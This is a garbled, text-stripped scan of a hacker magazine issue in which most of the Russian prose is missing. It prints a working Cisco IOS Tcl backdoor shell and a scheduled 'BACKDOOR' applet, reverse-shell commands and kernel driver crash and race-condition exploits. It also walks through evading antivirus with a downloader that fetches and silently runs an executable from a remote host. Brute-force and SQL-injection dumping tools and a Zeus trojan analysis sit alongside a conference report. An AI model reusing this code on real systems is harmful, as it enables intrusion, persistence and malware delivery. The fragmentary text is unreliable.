, Tcl
IOS.
TCL- 15 (enable). Tcl
,
, TFTP, FTP, RCP, SCP.
RAM-,
FLASH- c
IOS.
FLASH :
Router# copy tftp://192.168.1.4/script.tcl flash://
script.tcl
Router# tclsh flash://script.tcl

TFTP-:
Router# tclsh tftp://192.168.1.4/script.tcl

TCL-,
TCP/2002 (EXEC).
, (
TFTP).
proc callback {sock addr port} {
fconfigure $sock -translation crlf -buffering line
puts $sock "Cisco router admin console:"
puts $sock " "
puts -nonewline $sock "Router# "
flush $sock
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
flush $sock
if {[catch {gets $sock line}] ||
[eof $sock]} {
return [close $sock]
}
X 11 /142/ 10

192. 168. 1. 10

catch {exec $line} result


if {[catch {puts $sock $result}]} {
return [close $sock]
}
puts -nonewline $sock "Router# "
flush $sock
}
set port 2002
set sh [socket -server callback $port]
vwait var
close $sh


( EXEC)

- (level 15).
[ptsec@maxpatrol ~]$ telnet router 2002
Trying 192.168.1.10...
Connected to router.
Escape character is '^]'.
Cisco router admin console:
Router#

, Tcl
IOS. IOS,
Tcl, EXEC. ,
clear
line. -
:
1. , (console 0 vty 0 4), ,
exec-timeout 0 0, .
Router>en
Router#conf t
Enter configuration commands, one per line.
CNTL/Z.
Router(config)#line vty 0 4
Router(config-line)#exec-timeout 0 0

End with

2. EEM
(Embedded Event Manager) ,
, . -

065

tclsh tftp://192.168.1.4/ioscat.tcl -ie -oa 192.168.1.4 -op12345

2 !

[plsec@maxpatrol ~]$ nc -l -p 12345
Router#

./tftpboot/
.ioscat.tcp

TFTP-
()
192. 168. 1. 4

192. 168. 1. 10

CISCO
Shell
[ptsec@maxpatrol~}$ telnet router 2002
Trying 192. 168. 1. 10...
Connected to router.
Escape characters is ' ^].

tclsh tftp://192.168.1.4/
ioscat,tcl -ip2002 -oe

Router #
./tftpboot/
.ioscat.tcp

TFTP-
()
192. 168. 1. 4

,
TFTP 20 .
Router(config)# event manager applet BACKDOOR
Router(config-applet)# event timer countdown name
Delay time 20
Router(config-applet)# action 1.0 cli command "enable"
Router(config-applet)# action 1.1 cli command "tclsh
tftp://192.168.1.4/script.tcl"
Router(config-applet)# action 1.2 syslog msg "Backdoor
is executed"

3. TCL- EEM (Embedded


Event Manager) ,
, .

, IOScat
IOSmap, IOScat,
, .
TCL,
Netcat, TCL flash- TFTP-
RAM. TCL . .
(2002 ):

192. 168. 1. 10

(
netcat: nc -l -p 12345)


(2002):
Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002
-oa192.168.2.1 -op80

, , -
,
.
IOSmap ,
nmap, , ,
IOS.
TCL- IP- TCP/UDP-,
ICMP. :
Router>en
Router#tclsh tftp://192.168.1.4/iosmap.tcl
192.168.1.1-5 -p20-24,80,443
Loading iosmap.tcl from 192.168.1.4 (via
FastEthernet0/0): !
[OK - 15912 bytes]

Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 oe

( 12345):
Router# tclsh tftp://192.168.1.4/ioscat.tcl -ie
-oa192.168.1.4 -op12345

066

Loading services.list from 192.168.1.4 (via


FastEthernet0/0): !
[OK - 42121 bytes]
Starting IOSmap 0.9 ( http://www.defaultroute.ca ) at



[plsec@maxpatrol ~]$ lynx http://192.168.4:2002

tclsh tftp://192.168.1.4/ioscat.tcl ip2002 -oa192.168.2.1 -op80


-
192.168.2.1

./tftpboot/
.ioscat.tcp

TFTP-
()
192. 168. 1. 4

192. 168. 1. 10

, . , ,
:

MaxPatrol

2002-03-01 02:59 UTC
Free Memory on Platform = 29038388 / Memory required for this scan = 2622514
Host 192.168.1.1 is unavailable
Host 192.168.1.2 is unavailable

Router# show processes cpu | i Tcl
 212  2284  17762  128  3.68%  2.88%  0.67%  162 Tcl Serv - tty16
Router# show tcp brief all
TCB       Local Address      Foreign Address    (state)
659CDABC  192.168.1.10.23    192.168.1.4.5163   ESTAB
654485B4  *.2002             *.*                LISTEN
65CA2D04  *.80               *.*                LISTEN

Host 192.168.1.3 is unavailable


Interesting ports on host 192.168.1.4
PORT     STATE   SERVICE
20/tcp   closed  ftp-data
21/tcp   closed  ftp
22/tcp   closed  ssh
23/tcp   closed  telnet
24/tcp   closed  priv-mail
80/tcp   open    http
443/tcp  closed  https
Host 192.168.1.5 is unavailable
Router#


:
-sP ;
-sT TCP- TCP connect;
-sU UDP- IP SLA.

L,

Cisco Systems.

IOS 12.4(4) CPP (Control Plane Policy):


Router# show control-plane host open-ports
Active internet connections (servers and established)
Prot|Local Address|Foreign Address|Service|State
tcp|*:23|*:0|Telnet|LISTEN
tcp|*:23|192.168.1.4:1379|Telnet|ESTABLIS
tcp|*:80|*:0|HTTP CORE|LISTEN
tcp|*:1234|*:0|Tcl Serv - tty163|LISTEN

,

MaxPatrol ( ptsecurity.ru).

, , , Cisco
TCL-.
.
,
IOS .
, Cisco :). z

067


CISS Research Team?




,
Windows
Ring 0.
, ,
, HIPS (Host Intrusion Prevention System)
internet security.
,
,
, .
, , ,
,
,
.
?

068

ioctl


, .
-.
,
,

. ,
- (I/O manager). ,


BSOD
trend micro
. ,
- .
, IoCreateDevice.
-.
- (, , ,
..),
(, ). , ,
DRIVER_OBJECT, IRP (I/O Request
Packet) .
DRIVER_OBJECT::MajorFunction, , ,
, IRP_MJ_
MAXIMUM_FUNCTION + 1.
IRP_MJ_MAXIMUM_FUNCTION Driver Development Kit (DDK) 27. ,
, , . IRP :

typedef
NTSTATUS
(*PDRIVER_DISPATCH) (
IN struct _DEVICE_OBJECT *DeviceObject,
IN struct _IRP *Irp
);

DeviceObject (
), Irp , ,
, , .
, , ,
. , CreateFile/OpenFile ( native- NtCreateFile/
NtOpenFile). , ,
,
, , - .
, ,
, IRP_MJ_CREATE.

.
,
,

CreateFile. ,
ReadFile, WriteFile DeviceIoControlFile
.
.
,
:
BOOL
WINAPI
DeviceIoControl(
HANDLE hDevice,
DWORD dwIoControlCode,
LPVOID lpInBuffer,
DWORD nInBufferSize,
LPVOID lpOutBuffer,
DWORD nOutBufferSize,
LPDWORD lpBytesReturned,
LPOVERLAPPED lpOverlapped
);

hDevice ,
lpInBuffer nInBufferSize , lpOutBuffer nOutBufferSize
,
.
dwIoControlCode.
, .
-
(
) . -
:
DEVICE TYPE ( 16-31); 0-7FFFh Microsoft,
8000h-0FFFFh ,
. IoCreateDevice
DeviceType .
ACCESS , .
FILE_ANY_ACCESS .
FILE_READ_ACCESS .
FILE_WRITE_ACCESS .
FUNCTION , .
METHOD -.
METHOD_BUFFERED -.
,
,
nInBufferSize nOutBufferSize DeviceIoControl.

069

BSOD


( lpInBuffer). IRP_MJ_DEVICE_CONTROL AssociatedIrp.SystemBuffer
IRP, Parameters.DeviceIoControl.
InputBufferLength IO_STACK_LOCATION. ,
, - . IRP , IoStatus.Information
IRP.
METHOD_IN_DIRECT METHOD_OUT_DIRECT
-.

MDL MdlAddress
IRP. , ,
, .
METHOD_NEITHER ,
. DeviceIoControl.Type3InputBuffer
IO_STACK_LOCATION
, UserBuffer IRP
.

user-mode DDK ProbeForRead/ProbeForWrite.


- METHOD_NEITHER,


IRP- ( DeviceIoControl.Type3InputBuffer
UserBuffer).

ProbeForWrite,
, ,
, , BSD . ,
, ,
. .
,
PASSIVE- APC IRQ Level. DPC
,

.

,
,

070

, ,
..
.
tmtdi:
kd> !devobj tmtdi
Device object (812cc9f0) is for:
tmtdi*** ERROR: Module load completed but symbols could not be loaded for tmtdi.sys
\Driver\tmtdi DriverObject 816693b8
Current Irp 00000000 RefCount 1 Type 00000022 Flags 00000040
Dacl e12cbbb4 DevExt 812ccaa8 DevObjExt 812ccab0
ExtensionFlags (0000000000)
Device queue is not busy.
kd> !drvobj 816693b8 2
Driver object (816693b8) is for:
\Driver\tmtdi
DriverEntry: f0f0c505 tmtdi
DriverStartIo: 00000000
DriverUnload: 00000000
AddDevice: 00000000
Dispatch routines:
...
[0e] IRP_MJ_DEVICE_CONTROL f0f07b38 tmtdi+0xdb38 <------ IoCtl

, tmtdi tmtdi.sys. , ,
(Kernel Pool Memory Corruption,
DVD):
BSoD:
hDevice = CreateFileA(
"\\\\.\\tmtdi",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
inbuff = (char *)malloc(0x4000);
if(!inbuff)
{

[Figure: path of a DeviceIoControl request. User space: GUI / user-mode subsystem -> Kernel32.dll DeviceIoControl -> NTDLL.DLL NtDeviceIoControlFile (I/O subsystem); kernel space: Executive API and I/O manager -> file system driver and device drivers -> hardware abstraction layer (read/write port, timers, clocks, DMA, cache control) -> hardware interfaces]
printf("malloc failed!\n");
return 0;
}


memset(inbuff, 'A',0x4000-1);
ioctl = 0x220044;
DeviceIoControl(hDevice, ioctl,
(LPVOID)inbuff, 0x10,
(LPVOID)inbuff, 0x10, &cb,NULL);



.


(
NtLoadDriver). ,

.
,
(Zw*
Nt* ntdll.dll), (Zw*
ntoskrnl.exe).

, - . , ,
,
GetPreviousMode.
PreviousMode KTHREAD, , .

Race Condition
(RC) ( TOCTTOU). Matousec,
RC, PoC/
Exploit.
,

SSDT-, RC.
1.
;
(RkUnhooker, GMER ) SSDT:

ntkrnlpa.exe-->NtCreateKey, Type: Address change 0x8061A286-->F8D380E6 [Unknown module filename]
ntkrnlpa.exe-->NtCreateThread, Type: Address change 0x805C7208-->F8D380DC [Unknown module filename]
ntkrnlpa.exe-->NtDeleteKey, Type: Address change 0x8061A716-->F8D380EB [Unknown module filename]
ntkrnlpa.exe-->NtDeleteValueKey, Type: Address change 0x8061A8E6-->F8D380F5 [Unknown module filename]
ntkrnlpa.exe-->NtLoadDriver, Type: Address change 0x80579588-->F8D38113 [Unknown module filename]
ntkrnlpa.exe-->NtLoadKey, Type: Address change 0x8061C482-->F8D380FA [Unknown module filename]
ntkrnlpa.exe-->NtOpenProcess, Type: Address change 0x805C1296-->F8D380C8 [Unknown module filename]
ntkrnlpa.exe-->NtOpenThread, Type: Address change 0x805C1522-->F8D380CD [Unknown module filename]
ntkrnlpa.exe-->NtReplaceKey, Type: Address change 0x8061C332-->F8D38104 [Unknown module filename]
ntkrnlpa.exe-->NtRestoreKey, Type: Address change 0x8061BC3E-->F8D380FF [Unknown module filename]
ntkrnlpa.exe-->NtSetSystemInformation, Type: Address change 0x80605E76-->F8D38118 [Unknown module filename]
ntkrnlpa.exe-->NtSetValueKey, Type: Address change 0x8061880C-->F8D380F0 [Unknown module filename]
ntkrnlpa.exe-->NtTerminateProcess, Type: Address change 0x805C8C2A-->F8D380D7 [Unknown module filename]
ntkrnlpa.exe-->NtWriteVirtualMemory, Type: Address change 0x805A981C-->F8D380D2 [Unknown module filename]

HTTP://WWW
links

,
ruscrypto.org/netcat_files/File/ruscrypto.2009.027.zip


Windows,

rsdn.ru/article/asm/
driverholes.xml.
ibm.com/developerworks/linux/library/ldevctrl-migration/
wasm.ru/series.
php?sid=9
seclists.org/bugtraq/2003/Dec/351
matousec.com/
info/articles/khobe8.0-earthquake-forwindows-desktopsecurity-software.php

071

IoCtl
2. ,
, , NtCreateKey (POBJECT_
ATTRIBUTES, PUNICODE_STRING).
3. seclists.org/bugtraq/2003/
Dec/351.
4. :
ZwCreateKey = (_ZwCreateKey *) GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "ZwCreateKey");
...
OBJECT_ATTRIBUTES oa;
wchar_t wcKeyName[] = L"\\REGISTRY\\User\\S-1-5-21-861
567501-287218729-1801674531-1003\\Software\\NetScape";
UNICODE_STRING KeyName = {
sizeof wcKeyName - sizeof wcKeyName[0],
sizeof wcKeyName,
wcKeyName
};
...
while ( !_kbhit() )
{
HANDLE hKey;
oa.ObjectName->Buffer = (PWSTR)ptr;
NTSTATUS rc = ZwCreateKey(&hKey, KEY_READ, &oa,
TitleIndex, NULL,
REG_OPTION_NON_VOLATILE, &Disposition);
if ( NT_SUCCESS(rc) )
CloseHandle(hKey);
}
...
DWORD WINAPI Crack(LPVOID Context)
{
POBJECT_ATTRIBUTES oa = (
POBJECT_ATTRIBUTES) Context;
DWORD *ptr = (DWORD*)&oa->ObjectName->Buffer;
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_HIGHEST);
SetEvent(hStartEvent);
while ( true )
{
*ptr = 0x90909090; //

if ( WaitForSingleObject(hStopEvent, 1)
== WAIT_OBJECT_0 ) break;
}
return 0;
}

072

5. . ,
( 8 60),
. BSOD.

.
kd> !analyze -v
Bugcheck Analysis
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be
protected by try-except, it must be protected by a
Probe. Typically the address is just plain bad or it
is pointing at freed memory.

DVD.
,
/ , . ,

:
1. , , ASCII- Unicode-, ,
strlen/wcslen
Page Fault .
2. kernel mode-, .
, . ,
, , .
3. , ,
, .

ZwDuplicateHandle,

,
.

, , HIPS
. . , . , . z


icq 884888, http://snipper.ru

X-TOOLS
: WBF.Gold
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: [x26]VOLAND

-
- WBF.Gold

X-Tools [Web] BruteForcer
.

:
POST;
GET;
Basic- (
HEAD);
HTTPS (
HTTPS-);
(GET/POST);
Cookies;

(
);
( ,
, );
:
XML- ()
;
input , .

:

;

;

;
;
;

074


(
);
.

, WBF.Gold
-,

.

, wonted.ru/programms/
wbf-gold

: VPSProxy
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: [x26]VOLAND

- [x26]
VOLAND.

HTTP/HTTPS- PHP GUI-.

,
,

GUI.
. ,
:
HTTPS PHP-;
HTTPS-;

;

SOCKS5-;

- ;
cookies,
(
,
mycookie=value; mycookie2=123;);
;
;

HTTP 1.0;

;
,
, (/

);
;

;

;
;
: tray (
), start ( ),
hidden ( ).

1. gate.php
( 123);

2. URL

/cookies (
),
Use;
3. (
);
4. Start
localhost:2222 (HTTP) localhost:2223
(HTTPS);
5.
:).
:
[dir]\
VPSProxy.exe -tray -start.

forum.antichat.ru/thread227973.
html.

Reverse IP

: 0xRILPSIC
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: 0x00

,
webxakep.net
0xRILPSIC (Reverse IP + Link Parse +
SQL Injection Check).
,
:
1. Reverse IP ;
2.
;
3.
SQL-.
:
1. -
, ;
2. 0xRILPSIC Reverse IP (
, IP);
3.
- ;
4.
SQL-;
5. :).
,
IP
.

:
Reverse IP, ;

;
;
HTTP-;

;

;

;

;


links.txt;
(

);
;

;

-

SQL-
check.txt;
-;
;
.

.

:

- ;

(

);

;
SQL Injection
,
, SQL- (
);

;

.

http://icq-email-vkontakte.ru/
forum/showthread.php?p=59345.

: rsaUnDumper[sql]
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: rsaReliableS


SQL- . ,
,
SQL-, .

SQL-
!
:
( 1 100 );
HTTP-;
( DDoS );

( MySQL
);

UserAgent Referer;
/ dump (
, );

,
;
,
;
SQL
limit';
, ;
,
;

;
;
-
;
;
.Net Framework 2.0+.



SQL-.
http:// limit,

<{param}>, ...
,
.
http://icq-emailvkontakte.ru/forum/showthread.php?t=8310.

: Small Parser
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: DjFly

,

Small Parser
, DjFly.
uin;pass,
login@mail.ru .. ( ,

).

import.
txt, , Start.

import.txt
export.txt.z

075

MALWARE
deeonis deeonis@gmail.com

KIS2011, NOD32, Avira, McAfee: !


,

. ,
.
. ,
.
,
.
Kaspersky Internet Security 2011,
. ESET NOD32
,
.
ThreatSense, ,

. Avira AntiVir. . , ,
McAfee ,

. , .
, ? .

, -. :

076


LONG res;
TCHAR szUrl[] = _T("http://virhost.com/bin/launch.exe");
TCHAR szTempName[] = _T("C:\\launch.exe");
//
res = URLDownloadToFile(NULL,szUrl,
szTempName,NULL,NULL);
if (res == S_OK) {
ShellExecute(NULL,_T("open"), szTempName, NULL,
NULL, SW_HIDE);
}

- exe- ,
.

.
.
downloader. , ,

- .
, ?!
Heur.Downloader, NOD32 probably unknown
NewHeur_PE.

, (
),
.
. .
.
.

.
URLDownloadToFile , ,
ShellExecute ,
. ,
,
URLDownloadFile.
:

LONG res;
//
TCHAR szUrl[] = _T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
//
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
//
res = URLDownloadToFile(NULL,szUrl,szTempName,
NULL,NULL);

if (res == S_OK)
{
ShellExecute(NULL,_T("open"), szTempName,
NULL, NULL, SW_HIDE);
}

, szUrl szTempName
.
. , ,
decrypt , . ,
,
, , .
, . , ,
, Heur.Downloader. NOD32
, ,
probably unknown NewHeur_PE.
Avira McAfee, TR/
Downloader.Gen Suspect-D!2B731345A4DA .
, .
. ,
.

. , .
,
- (,
),

.
, , . 2000001 (, ?). ,
, ,
, .

077

MALWARE


.
,

, .

. :

//

,
Malware
, ,
. ,
,
: , .
,
, ,
, - .
,
, . , McAfee,
,

. , deeonisa
,
,
, .
, .

,
, .

078

// ...
for (size_t i = 0; i <= 2000000; i++)
{
//
int key = (i%5)-(i%5) + 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
}
//
// ...

,
(, ),
, ,

McAfee?
McAfee , , ,

exe-. ,
API-, , McAfee .
,
, .
, .
, , .
API , McAfee .
,
CreateFile ntldr,

.

//
// ...

key
CommandLineToArgvW. , , , ,
,
, .
, McAfee, . ,
Antivir . McAfee
. , .


. , .
: CreateFile
ntldr, .
, , INVALID_HANDLE_VALUE.
, :

Avira
/. KIS2011 ,
.
. NOD32 , Kaspersky
, . , .
! AntiVir
TR/Downloader.Gen. McAfee

Suspect-D!601711206FB9. ,
:
. McAfee ,
.

.
, ,
.
.

,
.
API.

Windows, , , ,
API. , API. ,
CommandLineToArgvW ,
.
,

.

CreateFile
//
//
HANDLE h = CreateFileA("c:\\ntldr",
FILE_READ_ACCESS, 0, 0, OPEN_EXISTING, 0, NULL);
// if
if (h != INVALID_HANDLE_VALUE)
{
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
}
//
// ...

, ,
, INVALID_HANDLE_VALUE, , ,
.
Scan . KIS . NOD32
Avira AntiVir. McAfee ,
Suspect-D!73AD7FD9A4E5. McAfee
.

API- Windows:
CreateFile GetLastError. ,
CreateFile ,
, , - ghj12lkfd0fivndsi83s.cj8.
GetLastError
ERROR_FILE_NOT_FOUND.
.

CommandLineToArgvW
//
// ...
// the key is the number of command-line arguments
int key;
CommandLineToArgvW(lpCmdLine, &key);
decrypt(szUrl,key);
decrypt(szTempName,key);
// ...

GetLastError
//
// ...
// the key is derived from GetLastError: ERROR_FILE_NOT_FOUND is 2, so key becomes 5
HANDLE h = CreateFile(
_T("c:\\jdksjf9i34ufhvnmfieru834gfbher.xls"),
FILE_READ_ACCESS, 0, 0, OPEN_EXISTING, 0, NULL);
DWORD key = GetLastError();
key += 3;
decrypt(szUrl,key);
decrypt(szTempName,key);
// ...

URLDownloadToFile
ShellExecute. :

// encrypted URL and temporary file name
TCHAR szUrl[] = _T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
// decryption is moved into a separate thread
void thr1()
{
Sleep(0);
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
}
//
// ...

Avira AntiVir Personal

, ,
GetLastError CreateFile,
API,
.
. ,
, , . Kaspersky
, . , , Heur.Downloader. NOD32.
. ,
McAfee .

.
. .
. -

int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
DWORD p;
HANDLE t1=CreateThread(0,0,
(LPTHREAD_START_ROUTINE)&thr1,0,0,&p);
Sleep(3000);
//
// ...
}

, Sleep.
, . 100%

.
. , , McAfee, KIS2011 . 32
Avira . ,
, AntiVir.
.

7

, McAfee , -
. .
-, ,
McAfee 8. - .
. ,
.
.

Test results (detections out of 8):
KIS2011: + + + + (4 of 8)
NOD32: + (1 of 8)
Avira AntiVir: + + (2 of 8)
McAfee: + + + + + + + (7 of 8)

.
,

(event).
, ,
e_Heur.
.
:

// encrypted URL and temporary file name
TCHAR szUrl[] = _T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
void thr1()
{
// wait until the main thread signals the event
HANDLE event = OpenEvent(SYNCHRONIZE ,FALSE,
_T("e_Heur"));
WaitForSingleObject(event,INFINITE);
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
}
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
HANDLE event = CreateEvent(NULL, TRUE, FALSE,
_T("e_Heur"));
DWORD p;
HANDLE t1=CreateThread(0,0,
(LPTHREAD_START_ROUTINE)&thr1,0,0,&p);
Sleep(2000);
SetEvent(event);
Sleep(2000);
//
// ...
}


. ,
6. McAfee , NOD32 , ,
.

McAfee
,
API- .
, ( , McAfee) .
URLDownloadToFile ShellExecute, .
:

API
typedef HRESULT (__stdcall *URLFUNC)(LPUNKNOWN,LPCTSTR,
LPCTSTR,DWORD,LPBINDSTATUSCALLBACK);
typedef HINSTANCE (__stdcall *EXECFUNC)(HWND,LPCTSTR,
LPCTSTR,LPCTSTR,LPCTSTR,INT);
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
LONG res;
// encrypted URL and temporary file name
TCHAR szUrl[] =
_T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
// encrypted names of the functions resolved at run time
TCHAR szUrlDownload[] =
_T("PWIAjrkijdaQjCli`R");//_T("URLDownloadToFileW");
TCHAR szShellExec[] =
_T("Vm`ii@}`fpq`R");//_T("ShellExecuteW");
HANDLE h = CreateFileA("e:\\ntldr",
FILE_READ_ACCESS, 0, 0, OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE)
{
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
decrypt(szUrlDownload,key);
decrypt(szShellExec,key);
// resolve the functions through GetProcAddress instead of the import table
// (GetProcAddress takes an ANSI name; in a Unicode build these buffers must be char[])
HMODULE hModule = LoadLibrary(_T("urlmon.dll"));
URLFUNC urlProc = (URLFUNC)GetProcAddress(hModule,
szUrlDownload);
hModule = LoadLibrary(_T("shell32.dll"));
EXECFUNC execProc = (EXECFUNC)GetProcAddress(hModule,
szShellExec);
// download and run
res = (urlProc)(NULL,szUrl,szTempName,NULL,NULL);
if (res==S_OK)
{
(execProc)(NULL,_T("open"), szTempName,
NULL, NULL, SW_HIDE);
}
}
}

( ntldr
CreateFile),
API, ,
ShellExecuteW URLDownloadToFileW.
GetProcAddress
.
.

. NOD32 Avira AntiVir
, , , .
McAfee. , .
API
Made in USA.
.
, .

. ESET NOD32
. Avira AntiVir
2 8. . McAfee, . z


MALWARE
, Senior Malware Analyst Heuristic detection group, Kaspersky Lab.


Zeus

, ][ , Zeus.
2007 .
,
.


.

(
.


.) , Trojan-Spy.Win32.Zbot.
anyz.

,
: , ,

. 2. ResHacker
Dialog Zbot
1. DataDirectory PE- Zbot Hiew

. 3. Zbot

. 4.
Zbot

.
, PE-, ..
, .
Zbot: , , ..
, .

, , , ,
. ,
IDA 5.1 Hexrays.

CALL, /
[EBP + xx].
3.

API-,
FakeAPI.
,

. , ,
, HiliteMenuItem,
, , ,
:).
, , VirtualAlloc,
,
. 4 ,
IDA. , ,
UPX, .

-,

Hiew, UPX
, .
, RVA
0x1000, UPX0,
Physical Size . ,
, ImageBase + 0x1000
VirtualSize UPX0, . , , , .
.
ResHacker, Dialog
. , . -,
, Zbot
.
Hiew, 1.
, . ,
- .
UPX, .
PE .

,
VirtualAlloc . ,
PEB (Process Environment Block).
ReadOnlyStaticServerData, ,
Introduction to NT Internals : This field has a pointer to a pointer to a system-wide shared memory location (read-only). It is usually empty. , ,

. 7. Spy++

,
API,

FakeAPI

C:\WINDOWS.
.
.
NtQuerySystemInformation
0xAD SYSTEM_PERFORMANCE_INFORMATION .
,
PE. PETools LordPE + ImpRec 1.6 (PETools , ).
, Zeus, ,
-, . ,
,
. ,
Zeus C ,
, , . , , .
VMWare
IDA.
, FileMon, RegMon, Process Explorer
PETools LordPE. , IDA
Hex-Rays, ASM- C. . , (. . 5).
, Zbot : -f,
-i, -n, -v. , -I Information,
MessageBox
( . 6). -n ( Zeus Application Data


). -v

GetMessageW. , , ,
.
,

. . ,
,

. , Zeus ,
; ( ):
@echo off
:d
del "c:\zbot.exe"
if exist "c:\zbot.exe" goto d
del /F "C:\DOCUME~1\antonie\LOCALS~1\Temp\tmp8c7f7853.bat"

, ,
, , .
,
.
Zeus cabinet.dll,
FCICreate, FCIAddFile, FCIFlushCabinet . cab-,
.
nspr4.dll The Netscape Portable Runtime (NSPR), allows compliant applications to use system facilities such as threads, thread synchronization, I/O, interval timing, atomic operations, and several other low-level services in a platform-independent manner.
NSPR: PR_OpenTCPSocket,
PR_Close, PR_Read, PR_Write .

. 8. Zeus ****case.cc


,




. 6. Zbot -i
. Zeus
****case.cc,
. ,
, . IP-.
clean-mx.de
(. 8).
, Zeus , (
, . ,
).
, ,
, Zeus, .

. 5. Hex-Rays ,

Zeus #32768,
ConsoleWindowClass, CiceroUIWndFrame, MDIClient, SysListView32.
,
,
CiceroUIWndFrame. Spy++
Microsoft Visual Studio.

Zeus . ,
,
, , .
, ,

.
, ,
, .
, , ,
,
. , Zeus
, ,
-i. z



Mifrill (mifrill@real.xakep.ru); (toxa@real.xakep.ru)

CHAOS
CONSTRUCTIONS 2010
IT-
, ,
, .
(
) : - ,
, ,
. ,
, !
Chaos Constructions ,
.

,
Chaos Constructions 2009,
, ,
, .
, CC
1995

ENLiGHT, Chaos Constructions.
ENLiGHT


,
. , , ,
,
, - .

,
, ,

. ,
, ,


.
CC 90-,
2000-,
, ,
. 1999
Chaos Constructions
.
CC

2006 . , ,
,
, , , ,
.
CC ,
,

. Chaos Constructions
,

(
) .
,

CC10
? ENLiGHT,
, 15
, ,
.
, Chaos Constructions
15-, , 13-
. 15
ENLiGHT,
.
, ,
. ,
,
, : ,
,
, , . , ,
, ,
.
, ? ,
, , .
,
, ANSI- ASCII-,
. ,
, ,
. ,




,

, ,

ZX Spectrum, .
.
, (
).

,
,
, 64k Intro 512b Intro, , . , .
,
, ( ,

!), ,
, .
,
Assembly
,
,
:).

2010
- Chaos Constructions,
28-29 ,

-
47.

CC


,
, ,
,
.
CC , ,
. CC10
,
(
Combined 64k
Intro, Combined 4k Intro, Combined Demo,
ZX Spectrum 640k Demo, Combined Tiny MP3
Music, Oldschool Tiny Music ..),
ZX
Spectrum Graphics ZX Spectrum Coding.
CC
(
),

, .
,
.

,
.

: .
http://party10.cc.org.ru. FTP HTTP CC10

.
,
, Chaos
Constructions 2010
(
40). ,
,
,
.
, , , ,
.

,
.
CC ,

,
. , ,
,
, -, :

Real-time Graphics
Real-time Music. , ,
,

( ?!). ,

. ,

,
. ,



Chaos Constructions
,
, -
, ,
.
, CC ,
, ..,

.

, , CC10 . ,

,
.
, , ,

. - Mortal Combat,
(Battle City) Dendy.


Starcraft 2,
Guitar Hero 5 ,

Quake 3 CTF. ,
(
, ,
7 34 !)
Ethernet ,
ART
. -
, ,

Hack-Quest
][ (,
,
-) Toxa. ,
,
:).
, (, ?),


,
.
,
, , HDD Real-time Photo.


CC, ,
, , , .
CC
(16 ), ,
,
,
,
:).


, , -,

.
Chaos Constructions 2010, ,
, :
SDRF open source
, Open Source Hardware,

.
http://party10.cc.org.ru/seminar.php,

, -

.
, ,
, !

-, ,
,
CC .
, ,
,
, .
CC , ,

, , ,
.
BBS,
MSX-DOS, MS-DOS MacOS,
Atari
XE Game System Amiga 600?
jukni ( )
, .
, , !
,

,
Chaos Constructions . -, ,
, -
,

.
, , . ,
,
EasyJohn.
http://easyjohn.livejournal.com/164192.html.
, , , ,
, , EasyJohn,


ArkanoiD
: http://takedo.spb.ru

:
,


,
. , , ,
.
, (3yM), (random),
(oldayn) ,

! , -
,
CC
,
http://party10.cc.org.ru/online.php.

.

CC 2010


-,
. , ,
,

, .

2006 ,
,
-
. : ,
.
, ,
,
, , , ,
- ....
, Defcon, Blackhat,
, ?
, 2006
.


- .
CMS ,
,
-.

,
!
, 2007
HIT
.
( Chaos Constructions
HackAround)
, ,
.

:
, ,

.

. , ,
, ,

.
, 2008
-.

.

, , :).
:

-,

.
,
,
-.


:
! ,

. ,
:
,

. ,

- blackbox-
, , : ,
, ,
,
,
. ,
-
:

.
, 2008 - . :
,
.
,
.
:).
,

(,
, Positive
Technologies,
).

WAF
. 2009 - ,

Chaos Constructions.

-
,

:). ,

2010 ! , ,
,
, , -
. ,
-
, .

,




, ,

.
!

(
) Chaos Constructions,
: ,
.
,
, , .
. ,

, .
,
.
, -, ...
,
, .
, , , ,
.
? ,
,
-?
toxa@toxahost.ru, .
,
-,
.

CC

-
ESET - (
),
http://www.esetnod32.ru/company/podcast/.



, , . ,
, BlackHat, Assembly,
Hackers on Planet Earth, DEFCON .. ,
.
,

- 2010.
IT-
.

Hack In The Box

: 13-14
: -,
: http://www.hackinthebox.org/


HITB
][, ,
,
Hack In The Box .

,
CC

HITB ,
. 2010 ,
(HITB ).
, , -
.
(Kaspersky Lab), (ISC), (ISC)
IT-.

SecTor

: 26-27
: ,
: http://www.sector.ca

,
, , ,
. 2007
: 10.554 11.060
. ,
,
DreamHack ,
- .

HackFest

: 5-6
: ,
: http://www.hackfest.ca

, IT-,
- . SecTor ,
. ,
( SecTor ),
.
, .
.

SecTor, ,
, , ,
, HackFest .

.
, , ()
. HackFest ,
, , .

DeepSec

